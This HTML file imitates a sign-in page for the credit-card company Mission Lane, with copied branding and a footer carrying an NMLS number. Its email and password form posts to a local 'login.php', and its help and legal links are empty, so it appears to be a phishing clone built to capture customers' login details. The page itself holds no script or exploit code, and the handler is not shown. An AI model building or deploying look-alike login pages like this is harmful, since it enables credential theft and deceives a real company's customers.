<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
<style> 

body{
    width:100%;
    height:100%;
}
.header{
margin-top: -10px;
margin-left: -10px;
width: 532px;
height: 120px;
background: #ececec;


}
.fav{
    position: absolute;
    top:10px;
    left:20px;
    background: #047358;
    margin-left: 10px;
    height: 90px;
    width: 150px;
    border-radius: 10px;
}
h2{

    color:white;
    padding-left: 10px;
    padding-top: 10px;
    left: 18px;
    top:1px;
}

h1{
    font: bold;
    top:130px;
    display: flex;
    align-items: center;
    justify-content: center;
    left:50px;
    right: 50px;
    
}
.inputBox{
    display: flex;
    margin-left: -130px;
    justify-content: center;
} 
.inputBox input {
    width: 170%;
    height: 27px;
    padding: 15px;
    outline: none;
    border: 10;
    color: #000;
}
.footer{
width: 532px;
height: 350px;
background: #082D26;
margin-top: 350px;
margin-left: -10px;
}
h4{
    color: white;
    margin-left: 80px;
    padding-top: 70px;
}
h3{
    
}

@media only screen and (min-width: 1000px) {
    .header{
margin-top: -10px;
width: 100%;
height: 120px;
background: #ececec;


}
.fav{
    top:10px;
    left:20px;
    background: #047358;
    margin-left: 10px;
    height: 90px;
    width: 150px;
    border-radius: 10px;
}
h2{

    color:white;
    padding-left: 10px;
    padding-top: 10px;
    left: 18px;
    top:1px;
}

h1{
    font: bold;
    display: flex;
    align-items: center;
    justify-content: center;
    left:50px;
    right: 50px;
    width:100%;
    
}
.inputBox{
    display: flex;
    margin-left: -130px;
    justify-content: center;
} 
.inputBox input {
    width: 170%;
    height: 27px;
    padding: 15px;
    outline: none;
    border: 10;
    color: #000;
}
.footer{
width: 100%;
height: 350px;
background: #082D26;
margin-top: 350px;
}
h4{
    color: white;
    margin-left: 80px;
    padding-top: 70px;
}
button{
    position:absolute;
    background-color:blue; 
    color:white; 
    border-radius:80px;
    left:510px; 
    height: 50px; 
    width: 90px; 
    border-color: blue
}
}

</style>
<body>
    <div class="fav"><h2>Mission<br>Lane</h2>
    </div>
    <div class="header">
</div>
<h1>Sign in to your account</h1>
<form action="login.php" method="POST">
<div class="inputBox">
    <span><h3>Email</span><br>
    <input style="padding-right: 30px;"type="text" name="login_email" required="required">
    
</div><br>
<div class="inputBox">
    <span><h3>Password</span><br>
    <input style="padding-right:30px;" type="password" name="password" required="required">
    
</div>
<div class="inputBox">
    <a href="" style="text-decoration:none; padding-right: 10px;"><h3>Forgot your password?</h3></a>
</div>
<div class="inputBox">
    <a href="" style="text-decoration:none; padding-left: 90px;"><h3>New Member? Set up your account.</h3></a>
</div>
<button style="background-color:blue; color:white; border-radius:80px;
 margin-left:300px; height: 50px; width: 90px; border-color: blue;
 "> <strong>Sign In</strong></button>
</form>
<div class="footer"> <h4><a href="" style="text-decoration: none; color:white; font:bold;"><strong>Contact Us   Legal   Privacy</strong></a><br><br><br><br>

    © 2022 Mission Lane LLC. All Rights Reserved. NMLS #1857501<br><br>
    
    Mission Lane LLC does business in Arizona under the <p>
    trade name Mission Lane Card Services LLC.</p>
    
    </h4></div>
</body>
</html>